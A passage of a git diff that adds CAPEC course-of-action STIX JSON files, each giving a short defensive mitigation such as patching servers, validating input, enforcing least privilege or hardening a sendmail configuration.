"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json new file mode 100644 index 0000000000000000000000000000000000000000..6941f390ee9cbdd6cbf4ed79649e5fadca0f6cbf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d70d0dc1-91f9-4902-b0b8-d1cbff8abf6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20.json new file mode 100644 index 0000000000000000000000000000000000000000..30364eae528a72b2d2a3e54e4a823e85bf50a032 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--dc689f9c-1e7b-4cf9-b9c5-9f2fd015d32e", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.", + "id": "course-of-action--0bda0539-7bb3-4094-8f97-c0e908214b20", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-650-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json new file mode 100644 index 0000000000000000000000000000000000000000..9657ae652b76a3f5b5160e8d98a0b6f7ece8a57c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--b63d540d-adfc-4a00-bc36-5581d93fb89e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json new file mode 100644 index 0000000000000000000000000000000000000000..3578dd1705381ddc95fdca4860063f0d0c8b0f1f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--323f2a43-acb2-427e-90da-2779ece1f083", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json new file mode 100644 index 0000000000000000000000000000000000000000..eb12b141e27a70c22b9cb947187b858fb48513c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--b011af89-4e1a-47de-a2fc-f3c9fd26d565", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ", + "id": "course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-42-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json new file mode 100644 index 0000000000000000000000000000000000000000..ab1b245f47d7d8fe33ab784f618e9be6d5c7368d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--fed37a39-3d1a-4511-9f33-34a594097242", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Generate and validate MAC for cookies", + "id": "course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-31-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json new file mode 100644 index 0000000000000000000000000000000000000000..cabf7954520cee1f85d07966ea62b9250c274c2a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3ca7da5f-8dc5-4797-a4d2-1a0ab619ded5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure good compartmentalization in the system to provide protected areas that can be trusted.", + "id": "course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-27-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json new file mode 100644 index 0000000000000000000000000000000000000000..d5bde04bf12644e470f8c35cae2dd6b22df2093a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--238a10ae-8a28-4100-a4a6-986c98784e0e", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json new file mode 100644 index 0000000000000000000000000000000000000000..85eff3cb996cd4e61cd059f2da2f519189ea8c7a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--35505a39-31f2-4107-9433-8e283f1a911a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12.json new file mode 100644 index 0000000000000000000000000000000000000000..1c1459363be49c79728954518e0dc0d2667bcbe2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a10a9d14-72a6-4541-8e83-80b5418c5e0c", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "id": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-635-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json new file mode 100644 index 0000000000000000000000000000000000000000..0a76f48146648e37e0d88840870480ca58eb1028 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c42bc358-13ea-4cff-8502-68e8808786b2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Hide cookie's software information filed.", + "id": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-170-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json new file mode 100644 index 0000000000000000000000000000000000000000..b6f13d8a648e16c7e455c8a17c612fddfb8c8f2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--e897dc0d-725a-49cb-bb40-d2297d3675d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json new file mode 100644 index 0000000000000000000000000000000000000000..6804b86357da3cfaa3db2e1c02d793020bc768ce --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f7855bd2-3493-4224-9e39-b76d4fd5e4a7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json new file mode 100644 index 0000000000000000000000000000000000000000..1339346ed8ce62b2fcbf52dbea7de5a0287d5c46 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4168ccb7-c3f1-4a1f-8155-d7e487b61b6b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json new file mode 100644 index 0000000000000000000000000000000000000000..a601ef3ec6e7f2fbcefcfe5cd24d4166eb7fd8b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--91157d60-8a1d-4c9b-946a-85090acc3842", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78.json new file mode 100644 index 0000000000000000000000000000000000000000..f312b1c60664e7e57c02ac91be5ed584febbca9e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--f34e8584-00b1-4da7-8eaa-6af0d712e0db", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.", + "id": "course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json new file mode 100644 index 0000000000000000000000000000000000000000..cbb5af48d5817b28d338fca005b92de1d230d090 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f6f452de-dd42-4ec1-ab1d-a90cab514f74", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json new file mode 100644 index 0000000000000000000000000000000000000000..4d72726acd11b2e120a683da8010fe2652cc5101 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d01fc1b0-6816-42d6-9b92-6777d121de2c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json new file mode 100644 index 0000000000000000000000000000000000000000..079982dc943a8c685a8faab20c5689f12197cc0c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--2daa468b-f838-42ad-b736-14b305b5a0cd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8.json new file mode 100644 index 0000000000000000000000000000000000000000..66e41c6a22e8f9e5dfedde76286c9bc83ccae9d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--916be92e-1ee9-410b-8996-192295dce08f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)", + "id": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-72-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json new file mode 100644 index 0000000000000000000000000000000000000000..dc8b0a93fa1c7da6b01e1abcc0353971968facab --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--559f1623-0ed1-4ad8-82b5-7212b3eee4e4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json new file mode 100644 index 0000000000000000000000000000000000000000..e8f773172a9e28b082d13274e80e2334a9f214dc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json 
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--4c48137d-245d-414b-88f6-a676588cb60a",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.",
+ "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-135-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json
new file mode 100644
index 0000000000000000000000000000000000000000..a8d68b7457dfa0b48cdd8bab7a79cbae16602d5e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--c4388ce9-4870-4c4e-8159-98c6797a3fca",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.",
+ "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "name": "coa-228-0",
+ "object_marking_refs": [
